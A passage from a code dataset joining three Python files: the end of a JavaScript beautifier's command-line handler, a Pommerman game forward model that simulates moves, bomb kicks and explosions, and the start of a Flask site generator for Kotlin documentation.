else:
# normal comments output raw
self.output_lines[-1].text.append(line)
self.append_newline(preserve_statement_flags = True)
def handle_inline_comment(self, token_text):
self.output_space_before_token = True
self.append_token(token_text)
self.output_space_before_token = True
def handle_comment(self, token_text):
if self.input_wanted_newline:
self.append_newline(preserve_statement_flags = True)
if not self.input_wanted_newline:
self.trim_output(True)
self.output_space_before_token = True
self.append_token(token_text)
self.append_newline(preserve_statement_flags = True)
def handle_dot(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
self.output_space_before_token = True
else:
# allow preserved newlines before dots in general
# force newlines on dots after close paren when break_chained - for bar().baz()
self.allow_wrap_or_preserved_newline(token_text,
self.flags.last_text == ')' and self.opts.break_chained_methods)
self.append_token(token_text)
def handle_unknown(self, token_text):
self.append_token(token_text)
if token_text[len(token_text) - 1] == '\n':
self.append_newline()
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def main():
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv, "s:c:o:dEPjbkil:xhtfvXw:",
['indent-size=','indent-char=','outfile=', 'disable-preserve-newlines',
'space-in-paren', 'space-in-empty-paren', 'jslint-happy', 'brace-style=',
'keep-array-indentation', 'indent-level=', 'unescape-strings', 'help', 'usage',
'stdin', 'eval-code', 'indent-with-tabs', 'keep-function-indentation', 'version',
'e4x', 'wrap-line-length'])
except getopt.GetoptError as ex:
print(ex, file=sys.stderr)
return usage(sys.stderr)
js_options = default_options()
file = None
outfile = 'stdout'
if len(args) == 1:
file = args[0]
for opt, arg in opts:
if opt in ('--keep-array-indentation', '-k'):
js_options.keep_array_indentation = True
if opt in ('--keep-function-indentation','-f'):
js_options.keep_function_indentation = True
elif opt in ('--outfile', '-o'):
outfile = arg
elif opt in ('--indent-size', '-s'):
js_options.indent_size = int(arg)
elif opt in ('--indent-char', '-c'):
js_options.indent_char = arg
elif opt in ('--indent-with-tabs', '-t'):
js_options.indent_with_tabs = True
elif opt in ('--disable-preserve-newlines', '-d'):
js_options.preserve_newlines = False
elif opt in ('--space-in-paren', '-P'):
js_options.space_in_paren = True
elif opt in ('--space-in-empty-paren', '-E'):
js_options.space_in_empty_paren = True
elif opt in ('--jslint-happy', '-j'):
js_options.jslint_happy = True
elif opt in ('--eval-code'):
js_options.eval_code = True
elif opt in ('--brace-style', '-b'):
js_options.brace_style = arg
elif opt in ('--unescape-strings', '-x'):
js_options.unescape_strings = True
elif opt in ('--e4x', '-X'):
js_options.e4x = True
elif opt in ('--wrap-line-length ', '-w'):
js_options.wrap_line_length = int(arg)
elif opt in ('--stdin', '-i'):
file = '-'
elif opt in ('--version', '-v'):
return print(__version__)
elif opt in ('--help', '--usage', '-h'):
return usage()
if not file:
print("Must define at least one file.", file=sys.stderr)
return usage(sys.stderr)
else:
try:
if outfile == 'stdout':
print(beautify_file(file, js_options))
else:
mkdir_p(os.path.dirname(outfile))
with open(outfile, 'w') as f:
f.write(beautify_file(file, js_options) + '\n')
except Exception as ex:
print(ex, file=sys.stderr)
return 1
# Success
return 0
| 44.059501 | 4,249 | 0.583228 | [
"MIT"
] | fedmich/js-beautify | python/jsbeautifier/__init__.py | 68,865 | Python |
'''Module to manage and advanced game state'''
from collections import defaultdict
import numpy as np
from . import constants
from . import characters
from . import utility
class ForwardModel(object):
"""Class for helping with the [forward] modeling of the game state."""
def run(self,
num_times,
board,
agents,
bombs,
items,
flames,
is_partially_observable,
agent_view_size,
action_space,
training_agent=None,
is_communicative=False):
"""Run the forward model.
Args:
num_times: The number of times to run it for. This is a maximum and
it will stop early if we reach a done.
board: The board state to run it from.
agents: The agents to use to run it.
bombs: The starting bombs.
items: The starting items.
flames: The starting flames.
is_partially_observable: Whether the board is partially observable or
not. Only applies to TeamRadio.
agent_view_size: If it's partially observable, then the size of the
square that the agent can view.
action_space: The actions that each agent can take.
training_agent: The training agent to pass to done.
is_communicative: Whether the action depends on communication
observations as well.
Returns:
steps: The list of step results, which are each a dict of "obs",
"next_obs", "reward", "action".
board: Updated board.
agents: Updated agents, same models though.
bombs: Updated bombs.
items: Updated items.
flames: Updated flames.
done: Whether we completed the game in these steps.
info: The result of the game if it's completed.
"""
steps = []
for _ in num_times:
obs = self.get_observations(
board, agents, bombs, is_partially_observable, agent_view_size)
actions = self.act(
agents, obs, action_space, is_communicative=is_communicative)
board, agents, bombs, items, flames = self.step(
actions, board, agents, bombs, items, flames)
next_obs = self.get_observations(
board, agents, bombs, is_partially_observable, agent_view_size)
reward = self.get_rewards(agents, game_type, step_count, max_steps)
done = self.get_done(agents, game_type, step_count, max_steps,
training_agent)
info = self.get_info(done, rewards, game_type, agents)
steps.append({
"obs": obs,
"next_obs": next_obs,
"reward": reward,
"actions": actions,
})
if done:
# Callback to let the agents know that the game has ended.
for agent in agents:
agent.episode_end(reward[agent.agent_id])
break
return steps, board, agents, bombs, items, flames, done, info
@staticmethod
def act(agents, obs, action_space, is_communicative=False):
"""Returns actions for each agent in this list.
Args:
agents: A list of agent objects.
obs: A list of matching observations per agent.
action_space: The action space for the environment using this model.
is_communicative: Whether the action depends on communication
observations as well.
Returns a list of actions.
"""
def act_ex_communication(agent):
'''Handles agent's move without communication'''
if agent.is_alive:
return agent.act(obs[agent.agent_id], action_space=action_space)
else:
return constants.Action.Stop.value
def act_with_communication(agent):
'''Handles agent's move with communication'''
if agent.is_alive:
action = agent.act(
obs[agent.agent_id], action_space=action_space)
if type(action) == int:
action = [action] + [0, 0]
assert (type(action) == list)
return action
else:
return [constants.Action.Stop.value, 0, 0]
ret = []
for agent in agents:
if is_communicative:
ret.append(act_with_communication(agent))
else:
ret.append(act_ex_communication(agent))
return ret
@staticmethod
def step(actions,
curr_board,
curr_agents,
curr_bombs,
curr_items,
curr_flames,
max_blast_strength=10):
board_size = len(curr_board)
# Tick the flames. Replace any dead ones with passages. If there is an
# item there, then reveal that item.
flames = []
for flame in curr_flames:
position = flame.position
if flame.is_dead():
item_value = curr_items.get(position)
if item_value:
del curr_items[position]
else:
item_value = constants.Item.Passage.value
curr_board[position] = item_value
else:
flame.tick()
flames.append(flame)
curr_flames = flames
# Redraw all current flames
# Multiple flames may share a position and the map should contain
# a flame until all flames are dead to avoid issues with bomb
# movements and explosions.
for flame in curr_flames:
curr_board[flame.position] = constants.Item.Flames.value
# Step the living agents and moving bombs.
# If two agents try to go to the same spot, they should bounce back to
# their previous spots. This is complicated with one example being when
# there are three agents all in a row. If the one in the middle tries
# to go to the left and bounces with the one on the left, and then the
# one on the right tried to go to the middle one's position, she should
# also bounce. A way of doing this is to gather all the new positions
# before taking any actions. Then, if there are disputes, correct those
# disputes iteratively.
# Additionally, if two agents try to switch spots by moving into each
# Figure out desired next position for alive agents
alive_agents = [agent for agent in curr_agents if agent.is_alive]
desired_agent_positions = [agent.position for agent in alive_agents]
for num_agent, agent in enumerate(alive_agents):
position = agent.position
# We change the curr_board here as a safeguard. We will later
# update the agent's new position.
curr_board[position] = constants.Item.Passage.value
action = actions[agent.agent_id]
if action == constants.Action.Stop.value:
pass
elif action == constants.Action.Bomb.value:
position = agent.position
if not utility.position_is_bomb(curr_bombs, position):
bomb = agent.maybe_lay_bomb()
if bomb:
curr_bombs.append(bomb)
elif utility.is_valid_direction(curr_board, position, action):
desired_agent_positions[num_agent] = agent.get_next_position(
action)
# Gather desired next positions for moving bombs. Handle kicks later.
desired_bomb_positions = [bomb.position for bomb in curr_bombs]
for num_bomb, bomb in enumerate(curr_bombs):
curr_board[bomb.position] = constants.Item.Passage.value
if bomb.is_moving():
desired_position = utility.get_next_position(
bomb.position, bomb.moving_direction)
if utility.position_on_board(curr_board, desired_position) \
and not utility.position_is_powerup(curr_board, desired_position) \
and not utility.position_is_wall(curr_board, desired_position):
desired_bomb_positions[num_bomb] = desired_position
# Position switches:
# Agent <-> Agent => revert both to previous position.
# Bomb <-> Bomb => revert both to previous position.
# Agent <-> Bomb => revert Bomb to previous position.
crossings = {}
def crossing(current, desired):
'''Checks to see if an agent is crossing paths'''
current_x, current_y = current
desired_x, desired_y = desired
if current_x != desired_x:
assert current_y == desired_y
return ('X', min(current_x, desired_x), current_y)
assert current_x == desired_x
return ('Y', current_x, min(current_y, desired_y))
for num_agent, agent in enumerate(alive_agents):
if desired_agent_positions[num_agent] != agent.position:
desired_position = desired_agent_positions[num_agent]
border = crossing(agent.position, desired_position)
if border in crossings:
# Crossed another agent - revert both to prior positions.
desired_agent_positions[num_agent] = agent.position
num_agent2, _ = crossings[border]
desired_agent_positions[num_agent2] = alive_agents[
num_agent2].position
else:
crossings[border] = (num_agent, True)
for num_bomb, bomb in enumerate(curr_bombs):
if desired_bomb_positions[num_bomb] != bomb.position:
desired_position = desired_bomb_positions[num_bomb]
border = crossing(bomb.position, desired_position)
if border in crossings:
# Crossed - revert to prior position.
desired_bomb_positions[num_bomb] = bomb.position
num, is_agent = crossings[border]
if not is_agent:
# Crossed bomb - revert that to prior position as well.
desired_bomb_positions[num] = curr_bombs[num].position
else:
crossings[border] = (num_bomb, False)
# Deal with multiple agents or multiple bomb collisions on desired next
# position by resetting desired position to current position for
# everyone involved in the collision.
agent_occupancy = defaultdict(int)
bomb_occupancy = defaultdict(int)
for desired_position in desired_agent_positions:
agent_occupancy[desired_position] += 1
for desired_position in desired_bomb_positions:
bomb_occupancy[desired_position] += 1
# Resolve >=2 agents or >=2 bombs trying to occupy the same space.
change = True
while change:
change = False
for num_agent, agent in enumerate(alive_agents):
desired_position = desired_agent_positions[num_agent]
curr_position = agent.position
# Either another agent is going to this position or more than
# one bomb is going to this position. In both scenarios, revert
# to the original position.
if desired_position != curr_position and \
(agent_occupancy[desired_position] > 1 or bomb_occupancy[desired_position] > 1):
desired_agent_positions[num_agent] = curr_position
agent_occupancy[curr_position] += 1
change = True
for num_bomb, bomb in enumerate(curr_bombs):
desired_position = desired_bomb_positions[num_bomb]
curr_position = bomb.position
if desired_position != curr_position and \
(bomb_occupancy[desired_position] > 1 or agent_occupancy[desired_position] > 1):
desired_bomb_positions[num_bomb] = curr_position
bomb_occupancy[curr_position] += 1
change = True
# Handle kicks.
agent_indexed_by_kicked_bomb = {}
kicked_bomb_indexed_by_agent = {}
delayed_bomb_updates = []
delayed_agent_updates = []
# Loop through all bombs to see if they need a good kicking or cause
# collisions with an agent.
for num_bomb, bomb in enumerate(curr_bombs):
desired_position = desired_bomb_positions[num_bomb]
if agent_occupancy[desired_position] == 0:
# There was never an agent around to kick or collide.
continue
agent_list = [
(num_agent, agent) for (num_agent, agent) in enumerate(alive_agents) \
if desired_position == desired_agent_positions[num_agent]]
if not agent_list:
# Agents moved from collision.
continue
# The agent_list should contain a single element at this point.
assert (len(agent_list) == 1)
num_agent, agent = agent_list[0]
if desired_position == agent.position:
# Agent did not move
if desired_position != bomb.position:
# Bomb moved, but agent did not. The bomb should revert
# and stop.
delayed_bomb_updates.append((num_bomb, bomb.position))
continue
# NOTE: At this point, we have that the agent in question tried to
# move into this position.
if not agent.can_kick:
# If we move the agent at this point, then we risk having two
# agents on a square in future iterations of the loop. So we
# push this change to the next stage instead.
delayed_bomb_updates.append((num_bomb, bomb.position))
delayed_agent_updates.append((num_agent, agent.position))
continue
# Agent moved and can kick - see if the target for the kick never had anyhing on it
direction = constants.Action(actions[agent.agent_id])
target_position = utility.get_next_position(desired_position,
direction)
if utility.position_on_board(curr_board, target_position) and \
agent_occupancy[target_position] == 0 and \
bomb_occupancy[target_position] == 0 and \
not utility.position_is_powerup(curr_board, target_position) and \
not utility.position_is_wall(curr_board, target_position):
# Ok to update bomb desired location as we won't iterate over it again here
# but we can not update bomb_occupancy on target position and need to check it again
# However we need to set the bomb count on the current position to zero so
# that the agent can stay on this position.
bomb_occupancy[desired_position] = 0
delayed_bomb_updates.append((num_bomb, target_position))
agent_indexed_by_kicked_bomb[num_bomb] = num_agent
kicked_bomb_indexed_by_agent[num_agent] = num_bomb
bomb.moving_direction = direction
# Bombs may still collide and we then need to reverse bomb and agent ..
else:
delayed_bomb_updates.append((num_bomb, bomb.position))
delayed_agent_updates.append((num_agent, agent.position))
for (num_bomb, bomb_position) in delayed_bomb_updates:
desired_bomb_positions[num_bomb] = bomb_position
bomb_occupancy[bomb_position] += 1
change = True
for (num_agent, agent_position) in delayed_agent_updates:
desired_agent_positions[num_agent] = agent_position
agent_occupancy[agent_position] += 1
change = True
while change:
change = False
for num_agent, agent in enumerate(alive_agents):
desired_position = desired_agent_positions[num_agent]
curr_position = agent.position
# Agents and bombs can only share a square if they are both in their
# original position (Agent dropped bomb and has not moved)
if desired_position != curr_position and \
(agent_occupancy[desired_position] > 1 or bomb_occupancy[desired_position] != 0):
# Late collisions resulting from failed kicks force this agent to stay at the
# original position. Check if this agent successfully kicked a bomb above and undo
# the kick.
if num_agent in kicked_bomb_indexed_by_agent:
num_bomb = kicked_bomb_indexed_by_agent[num_agent]
bomb = curr_bombs[num_bomb]
desired_bomb_positions[num_bomb] = bomb.position
bomb_occupancy[bomb.position] += 1
del agent_indexed_by_kicked_bomb[num_bomb]
del kicked_bomb_indexed_by_agent[num_agent]
desired_agent_positions[num_agent] = curr_position
agent_occupancy[curr_position] += 1
change = True
for num_bomb, bomb in enumerate(curr_bombs):
desired_position = desired_bomb_positions[num_bomb]
curr_position = bomb.position
# This bomb may be a boomerang, i.e. it was kicked back to the
# original location it moved from. If it is blocked now, it
# can't be kicked and the agent needs to move back to stay
# consistent with other movements.
if desired_position == curr_position and num_bomb not in agent_indexed_by_kicked_bomb:
continue
bomb_occupancy_ = bomb_occupancy[desired_position]
agent_occupancy_ = agent_occupancy[desired_position]
# Agents and bombs can only share a square if they are both in their
# original position (Agent dropped bomb and has not moved)
if bomb_occupancy_ > 1 or agent_occupancy_ != 0:
desired_bomb_positions[num_bomb] = curr_position
bomb_occupancy[curr_position] += 1
num_agent = agent_indexed_by_kicked_bomb.get(num_bomb)
if num_agent is not None:
agent = alive_agents[num_agent]
desired_agent_positions[num_agent] = agent.position
agent_occupancy[agent.position] += 1
del kicked_bomb_indexed_by_agent[num_agent]
del agent_indexed_by_kicked_bomb[num_bomb]
change = True
for num_bomb, bomb in enumerate(curr_bombs):
if desired_bomb_positions[num_bomb] == bomb.position and \
not num_bomb in agent_indexed_by_kicked_bomb:
# Bomb was not kicked this turn and its desired position is its
# current location. Stop it just in case it was moving before.
bomb.stop()
else:
# Move bomb to the new position.
# NOTE: We already set the moving direction up above.
bomb.position = desired_bomb_positions[num_bomb]
for num_agent, agent in enumerate(alive_agents):
if desired_agent_positions[num_agent] != agent.position:
agent.move(actions[agent.agent_id])
if utility.position_is_powerup(curr_board, agent.position):
agent.pick_up(
constants.Item(curr_board[agent.position]),
max_blast_strength=max_blast_strength)
# Explode bombs.
exploded_map = np.zeros_like(curr_board)
has_new_explosions = False
for bomb in curr_bombs:
bomb.tick()
if bomb.exploded():
has_new_explosions = True
elif curr_board[bomb.position] == constants.Item.Flames.value:
bomb.fire()
has_new_explosions = True
# Chain the explosions.
while has_new_explosions:
next_bombs = []
has_new_explosions = False
for bomb in curr_bombs:
if not bomb.exploded():
next_bombs.append(bomb)
continue
bomb.bomber.incr_ammo()
for _, indices in bomb.explode().items():
for r, c in indices:
if not all(
[r >= 0, c >= 0, r < board_size, c < board_size]):
break
if curr_board[r][c] == constants.Item.Rigid.value:
break
exploded_map[r][c] = 1
if curr_board[r][c] == constants.Item.Wood.value:
break
curr_bombs = next_bombs
for bomb in curr_bombs:
if bomb.in_range(exploded_map):
bomb.fire()
has_new_explosions = True
# Update the board's bombs.
for bomb in curr_bombs:
curr_board[bomb.position] = constants.Item.Bomb.value
# Update the board's flames.
flame_positions = np.where(exploded_map == 1)
for row, col in zip(flame_positions[0], flame_positions[1]):
curr_flames.append(characters.Flame((row, col)))
for flame in curr_flames:
curr_board[flame.position] = constants.Item.Flames.value
# Kill agents on flames. Otherwise, update position on curr_board.
for agent in alive_agents:
if curr_board[agent.position] == constants.Item.Flames.value:
agent.die()
else:
curr_board[agent.position] = utility.agent_value(agent.agent_id)
return curr_board, curr_agents, curr_bombs, curr_items, curr_flames
def get_observations(self, curr_board, agents, bombs,
is_partially_observable, agent_view_size,
game_type, game_env):
"""Gets the observations as an np.array of the visible squares.
The agent gets to choose whether it wants to keep the fogged part in
memory.
"""
board_size = len(curr_board)
def make_bomb_maps(position):
''' Makes an array of an agents bombs and the bombs attributes '''
blast_strengths = np.zeros((board_size, board_size))
life = np.zeros((board_size, board_size))
for bomb in bombs:
x, y = bomb.position
if not is_partially_observable \
or in_view_range(position, x, y):
blast_strengths[(x, y)] = bomb.blast_strength
life[(x, y)] = bomb.life
return blast_strengths, life
def in_view_range(position, v_row, v_col):
'''Checks to see if a tile is in an agents viewing area'''
row, col = position
return all([
row >= v_row - agent_view_size, row <= v_row + agent_view_size,
col >= v_col - agent_view_size, col <= v_col + agent_view_size
])
attrs = [
'position', 'blast_strength', 'can_kick', 'teammate', 'ammo',
'enemies'
]
alive_agents = [
utility.agent_value(agent.agent_id)
for agent in agents
if agent.is_alive
]
observations = []
for agent in agents:
agent_obs = {'alive': alive_agents}
board = curr_board
if is_partially_observable:
board = board.copy()
for row in range(board_size):
for col in range(board_size):
if not in_view_range(agent.position, row, col):
board[row, col] = constants.Item.Fog.value
agent_obs['board'] = board
bomb_blast_strengths, bomb_life = make_bomb_maps(agent.position)
agent_obs['bomb_blast_strength'] = bomb_blast_strengths
agent_obs['bomb_life'] = bomb_life
agent_obs['game_type'] = game_type.value
agent_obs['game_env'] = game_env
for attr in attrs:
assert hasattr(agent, attr)
agent_obs[attr] = getattr(agent, attr)
observations.append(agent_obs)
return observations
@staticmethod
def get_done(agents, step_count, max_steps, game_type, training_agent):
# print('get_done called...', training_agent)
alive = [agent for agent in agents if agent.is_alive]
alive_ids = sorted([agent.agent_id for agent in alive])
if step_count >= max_steps:
print('gameover : max timestep over')
return True
elif game_type == constants.GameType.FFA:
if training_agent is not None and training_agent not in alive_ids:
print('gameover : ffa training_agent has died')
return True
if len(alive) <= 1:
print('checkout : ffa only %s player survived' % len(alive))
return len(alive) <= 1
elif len(alive_ids) <= 1:
print('gameover : only one player survived')
return True
elif alive_ids == [0, 2]:
print('gameover : [0,2] team won')
return True
elif any([ alive_ids == [1, 3] ]):
print('gameover : [1,3] team won')
return True
return False
@staticmethod
def get_info(done, rewards, game_type, agents):
if game_type == constants.GameType.FFA:
alive = [agent for agent in agents if agent.is_alive]
if done:
if len(alive) != 1:
# Either we have more than 1 alive (reached max steps) or
# we have 0 alive (last agents died at the same time).
return {
'result': constants.Result.Tie,
}
else:
return {
'result': constants.Result.Win,
'winners': [num for num, reward in enumerate(rewards) \
if reward == 1]
}
else:
return {
'result': constants.Result.Incomplete,
}
elif done:
# We are playing a team game.
if rewards == [-1] * 4:
return {
'result': constants.Result.Tie,
}
else:
return {
'result': constants.Result.Win,
'winners': [num for num, reward in enumerate(rewards) \
if reward == 1],
}
else:
return {
'result': constants.Result.Incomplete,
}
@staticmethod
def get_rewards(agents, game_type, step_count, max_steps):
print('get_rewards called..', self.training_agent)
def any_lst_equal(lst, values):
'''Checks if list are equal'''
return any([lst == v for v in values])
alive_agents = [num for num, agent in enumerate(agents) \
if agent.is_alive]
if game_type == constants.GameType.FFA:
if len(alive_agents) == 1:
# An agent won. Give them +1, others -1.
return [2 * int(agent.is_alive) - 1 for agent in agents]
elif step_count >= max_steps:
# Game is over from time. Everyone gets -1.
return [-1] * 4
else:
# Game running: 0 for alive, -1 for dead.
return [int(agent.is_alive) - 1 for agent in agents]
else:
# We are playing a team game.
if any_lst_equal(alive_agents, [[0, 2], [0], [2]]):
# Team [0, 2] wins.
return [1, -1, 1, -1]
elif any_lst_equal(alive_agents, [[1, 3], [1], [3]]):
# Team [1, 3] wins.
return [-1, 1, -1, 1]
elif step_count >= max_steps:
# Game is over by max_steps. All agents tie.
return [-1] * 4
elif len(alive_agents) == 0:
# Everyone's dead. All agents tie.
return [-1] * 4
else:
# No team has yet won or lost.
return [0] * 4
| 44.561162 | 103 | 0.564801 | [
"Apache-2.0"
] | psyoblade/playground | pommerman/forward_model.py | 29,143 | Python |
import copy
import datetime
import glob
import json
import os
import sys
import threading
from os import path
from urllib.parse import urlparse, urljoin, ParseResult
import xmltodict
import yaml
from bs4 import BeautifulSoup
from flask import Flask, render_template, Response, send_from_directory, request
from flask.views import View
from flask.helpers import url_for, send_file, make_response
from flask_frozen import Freezer, walk_directory
from hashlib import md5
from yaml import FullLoader
from src.Feature import Feature
from src.dist import get_dist_pages
from src.github import assert_valid_git_hub_url
from src.navigation import process_video_nav, process_nav, get_current_url
from src.api import get_api_page
from src.encoder import DateAwareEncoder
from src.externals import process_nav_includes
from src.grammar import get_grammar
from src.markdown.makrdown import jinja_aware_markdown
from src.pages.MyFlatPages import MyFlatPages
from src.pdf import generate_pdf
from src.processors.processors import process_code_blocks
from src.processors.processors import set_replace_simple_code
from src.search import build_search_indices
from src.sitemap import generate_sitemap, generate_temporary_sitemap
from src.ktl_components import KTLComponentExtension
app = Flask(__name__, static_folder='_assets')
app.config.from_pyfile('mysettings.py')
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
pages = MyFlatPages(app)
freezer = Freezer(app)
ignore_stdlib = False
build_mode = False
build_contenteditable = False
build_check_links = True
build_errors = []
url_adapter = app.create_url_adapter(None)
root_folder = path.join(os.path.dirname(__file__))
data_folder = path.join(os.path.dirname(__file__), "data")
_nav_cache = None
_nav_lock = threading.RLock()
_cached_asset_version = {}
def get_asset_version(filename):
if filename in _cached_asset_version:
return _cached_asset_version[filename]
filepath = (root_folder if root_folder else ".") + filename
if filename and path.exists(filepath):
with open(filepath, 'rb') as file:
digest = md5(file.read()).hexdigest()
_cached_asset_version[filename] = digest
return digest
return None
def get_site_data():
data = {}
for data_file in os.listdir(data_folder):
if data_file.startswith('_'):
continue
if not data_file.endswith(".yml"):
continue
data_file_path = path.join(data_folder, data_file)
with open(data_file_path, encoding="UTF-8") as stream:
try:
file_name_without_extension = data_file[:-4] if data_file.endswith(".yml") else data_file
data[file_name_without_extension] = yaml.load(stream, Loader=FullLoader)
except yaml.YAMLError as exc:
sys.stderr.write('Cant parse data file ' + data_file + ': ')
sys.stderr.write(str(exc))
sys.exit(-1)
except IOError as exc:
sys.stderr.write('Cant read data file ' + data_file + ': ')
sys.stderr.write(str(exc))
sys.exit(-1)
return data
site_data = get_site_data()
def get_nav():
global _nav_cache
global _nav_lock
with _nav_lock:
if _nav_cache is not None:
nav = _nav_cache
else:
nav = get_nav_impl()
nav = copy.deepcopy(nav)
if build_mode:
_nav_cache = copy.deepcopy(nav)
# NOTE. This call depends on `request.path`, cannot cache
process_nav(request.path, nav)
return nav
def get_nav_impl():
with open(path.join(data_folder, "_nav.yml")) as stream:
nav = yaml.load(stream, Loader=FullLoader)
nav = process_nav_includes(build_mode, nav)
return nav
def get_kotlin_features():
features_dir = path.join(os.path.dirname(__file__), "kotlin-features")
features = []
for feature_meta in yaml.load(open(path.join(features_dir, "kotlin-features.yml"))):
file_path = path.join(features_dir, feature_meta['content_file'])
with open(file_path, encoding='utf-8') as f:
content = f.read()
content = content.replace("\r\n", "\n")
if file_path.endswith(".md"):
html_content = BeautifulSoup(jinja_aware_markdown(content, pages), 'html.parser')
content = process_code_blocks(html_content)
features.append(Feature(content, feature_meta))
return features
@app.context_processor
def add_year_to_context():
return {
'year': datetime.datetime.now().year
}
app.jinja_env.add_extension(KTLComponentExtension)
@app.context_processor
def add_data_to_context():
nav = get_nav()
return {
'nav': nav,
'data': site_data,
'site': {
'pdf_url': app.config['PDF_URL'],
'forum_url': app.config['FORUM_URL'],
'site_github_url': app.config['SITE_GITHUB_URL'],
'data': site_data,
'text_using_gradle': app.config['TEXT_USING_GRADLE'],
'code_baseurl': app.config['CODE_URL'],
'contenteditable': build_contenteditable
},
'headerCurrentUrl': get_current_url(nav['subnav']['content'])
}
@app.template_filter('get_domain')
def get_domain(url):
return urlparse(url).netloc
app.jinja_env.globals['get_domain'] = get_domain
@app.template_filter('split_chunk')
def split_chunk(list, size):
return [list[i:i+size] for i in range(len(list))[::size]]
app.jinja_env.globals['split_chunk'] = split_chunk
@app.template_filter('autoversion')
def autoversion_filter(filename):
asset_version = get_asset_version(filename)
if asset_version is None: return filename
original = urlparse(filename)._asdict()
original.update(query=original.get('query') + '&v=' + asset_version)
return ParseResult(**original).geturl()
@app.route('/data/events.json')
def get_events():
with open(path.join(data_folder, "events.xml"), encoding="UTF-8") as events_file:
events = xmltodict.parse(events_file.read())['events']['event']
return Response(json.dumps(events, cls=DateAwareEncoder), mimetype='application/json')
@app.route('/data/cities.json')
def get_cities():
return Response(json.dumps(site_data['cities'], cls=DateAwareEncoder), mimetype='application/json')
@app.route('/data/kotlinconf.json')
def get_kotlinconf():
return Response(json.dumps(site_data['kotlinconf'], cls=DateAwareEncoder), mimetype='application/json')
@app.route('/data/universities.json')
def get_universities():
return Response(json.dumps(site_data['universities'], cls=DateAwareEncoder), mimetype='application/json')
@app.route('/data/user-groups.json')
def get_user_groups():
return Response(json.dumps(site_data['user-groups'], cls=DateAwareEncoder), mimetype='application/json')
@app.route('/docs/reference/grammar.html')
def grammar():
grammar = get_grammar(build_mode)
if grammar is None:
return "Grammar file not found", 404
return render_template('pages/grammar.html', kotlinGrammar=grammar)
@app.route('/docs/videos.html')
def videos_page():
return render_template('pages/videos.html', videos=process_video_nav(site_data['videos']))
@app.route('/docs/kotlin-reference.pdf')
def kotlin_reference_pdf():
return send_file(path.join(root_folder, "assets", "kotlin-reference.pdf"))
@app.route('/docs/kotlin-docs.pdf')
def kotlin_docs_pdf():
return send_file(path.join(root_folder, "assets", "kotlin-reference.pdf"))
@app.route('/community/')
def community_page():
return render_template('pages/community.html')
@app.route('/user-groups/user-group-list.html')
def user_group_list():
return render_template(
'pages/user-groups/user-group-list.html',
user_groups_data=site_data['user-groups'],
number_of_groups=sum(map(lambda section: len(section['groups']), site_data['user-groups'])))
@app.route('/education/')
def education_page():
return render_template('pages/education/index.html')
@app.route('/')
def index_page():
features = get_kotlin_features()
return render_template('pages/index.html',
is_index_page=True,
features=features
)
def process_page(page_path):
# get_nav() has side effect to copy and patch files from the `external` folder
# under site folder. We need it for dev mode to make sure file is up-to-date
# TODO: extract get_nav and implement the explicit way to avoid side-effects
get_nav()
page = pages.get_or_404(page_path)
if 'redirect_path' in page.meta and page.meta['redirect_path'] is not None:
page_path = page.meta['redirect_path']
if page_path.startswith('https://') or page_path.startswith('http://'):
return render_template('redirect.html', url=page_path)
else:
return render_template('redirect.html', url=url_for('page', page_path = page_path))
if 'date' in page.meta and page['date'] is not None:
page.meta['formatted_date'] = page.meta['date'].strftime('%d %B %Y')
if page.meta['formatted_date'].startswith('0'):
page.meta['formatted_date'] = page.meta['formatted_date'][1:]
if 'github_edit_url' in page.meta:
edit_on_github_url = page.meta['github_edit_url']
else:
edit_on_github_url = app.config['EDIT_ON_GITHUB_URL'] + app.config['FLATPAGES_ROOT'] + "/" + page_path + \
app.config['FLATPAGES_EXTENSION']
assert_valid_git_hub_url(edit_on_github_url, page_path)
template = page.meta["layout"] if 'layout' in page.meta else 'default.html'
if not template.endswith(".html"):
template += ".html"
if build_check_links:
validate_links_weak(page, page_path)
return render_template(
template,
page=page,
baseurl="",
edit_on_github_url=edit_on_github_url,
)
def validate_links_weak(page, page_path):
for link in page.parsed_html.select('a'):
if 'href' not in link.attrs:
continue
href = urlparse(urljoin('/' + page_path, link['href']))
if href.scheme != '':
continue
endpoint, params = url_adapter.match(href.path, 'GET', query_args={})
if endpoint != 'page' and endpoint != 'get_index_page':
response = app.test_client().get(href.path)
if response.status_code == 404:
build_errors.append("Broken link: " + str(href.path) + " on page " + page_path)
continue
referenced_page = pages.get(params['page_path'])
if referenced_page is None:
build_errors.append("Broken link: " + str(href.path) + " on page " + page_path)
continue
if href.fragment == '':
continue
ids = []
for x in referenced_page.parsed_html.select('h1,h2,h3,h4'):
try:
ids.append(x['id'])
except KeyError:
pass
for x in referenced_page.parsed_html.select('a'):
try:
ids.append(x['name'])
except KeyError:
pass
if href.fragment not in ids:
build_errors.append("Bad anchor: " + str(href.fragment) + " on page " + page_path)
if not build_mode and len(build_errors) > 0:
errors_copy = []
for item in build_errors:
errors_copy.append(item)
build_errors.clear()
raise Exception("Validation errors " + str(len(errors_copy)) + ":\n\n" +
"\n".join(str(item) for item in errors_copy))
@freezer.register_generator
def page():
for page in pages:
yield {'page_path': page.path}
@app.route('/<path:page_path>.html')
def page(page_path):
return process_page(page_path)
@app.route('/404.html')
def page_404():
return render_template('pages/404.html')
@freezer.register_generator
def api_page():
api_folder = path.join(root_folder, 'api')
for root, dirs, files in os.walk(api_folder):
for file in files:
yield {'page_path': path.join(path.relpath(root, api_folder), file).replace(os.sep, '/')}
class RedirectTemplateView(View):
def __init__(self, url):
self.redirect_url = url
def dispatch_request(self):
return render_template('redirect.html', url=self.redirect_url)
def generate_redirect_pages():
redirects_folder = path.join(root_folder, 'redirects')
for root, dirs, files in os.walk(redirects_folder):
for file in files:
if not file.endswith(".yml"):
continue
redirects_file_path = path.join(redirects_folder, file)
with open(redirects_file_path, encoding="UTF-8") as stream:
try:
redirects = yaml.load(stream, Loader=FullLoader)
for entry in redirects:
url_to = entry["to"]
url_from = entry["from"]
url_list = url_from if isinstance(url_from, list) else [url_from]
for url in url_list:
app.add_url_rule(url, view_func=RedirectTemplateView.as_view(url, url=url_to))
except yaml.YAMLError as exc:
sys.stderr.write('Cant parse data file ' + file + ': ')
sys.stderr.write(str(exc))
sys.exit(-1)
